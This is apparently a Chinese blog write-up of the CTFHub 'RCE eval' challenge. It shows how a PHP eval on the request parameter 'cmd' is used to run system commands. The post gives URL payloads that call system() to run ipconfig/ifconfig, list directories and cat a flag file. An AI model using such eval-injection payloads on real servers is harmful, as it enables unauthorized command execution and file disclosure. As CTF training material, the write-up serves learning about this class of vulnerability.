CTFHub-RCE eval执行

FGHua_kk2025-06-01 16:25

观察源代码

我们可以发现源代码是request请求，所以我们可以通过GET或者POST请求，利用cmd参数进行命令执行

判断是Windows还是Linux

复制代码

#### 用GET请求

![](https://i-blog.csdnimg.cn/img_convert/3953fb442538c15685b5aa6926a79cba.jpeg)
*

  ```php
  /?cmd=system('ipconfig');
  ```

<!-- -->

* 无回显 说明不是Windows系统 ![](https://i-blog.csdnimg.cn/img_convert/0b03e2d748cacda3d7860d5e27391c10.jpeg)

<!-- -->

*

  ```php
  /?cmd=system('ifconfig');
  ```

<!-- -->

* 可以发现有回显，说明命令执行成功，系统为Linux ![](https://i-blog.csdnimg.cn/img_convert/480728712941dd82146cac1a7ab842d3.jpeg)

查看有哪些文件

复制代码

```php
/?cmd=system('ls');
```

![](https://i-blog.csdnimg.cn/img_convert/24d60e2455ee4331bd91e436a1f8c719.jpeg)

显示只有index.php文件，我们再查询根目录下的文件

复制代码

```php
/?cmd=system('ls /');
```

发现目标flag文件

打开flag文件

复制代码

```php
/?cmd=system('cat /flag_11649');
```

![](https://i-blog.csdnimg.cn/img_convert/cb6bcfb2dbe991c3d366ba1b4b681326.jpeg)

成功获取flag